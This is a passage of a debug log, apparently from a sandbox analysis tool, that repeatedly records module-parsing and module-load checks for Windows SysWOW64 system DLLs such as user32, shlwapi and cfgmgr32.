2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,433 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,510 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,526 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:49,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:49,542 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:49,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:49,558 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:49,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:49,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,558 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:49,573 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:49,573 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,619 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:49,713 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:49,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:49,713 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\propsys.dll
2020-03-24 10:13:49,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\propsys.dll
2020-03-24 10:13:49,730 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:49,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:49,730 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:49,744 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:49,744 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntmarta.dll
2020-03-24 10:13:49,744 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntmarta.dll
2020-03-24 10:13:49,760 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\Wldap32.dll
2020-03-24 10:13:49,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\Wldap32.dll
2020-03-24 10:13:49,760 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:13:49,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:13:49,776 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:13:49,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:13:49,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,854 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,854 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,854 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,885 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,885 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,885 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,901 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,901 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,963 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,994 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,994 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:49,994 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,104 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,119 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,134 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,134 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,134 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,354 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,354 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
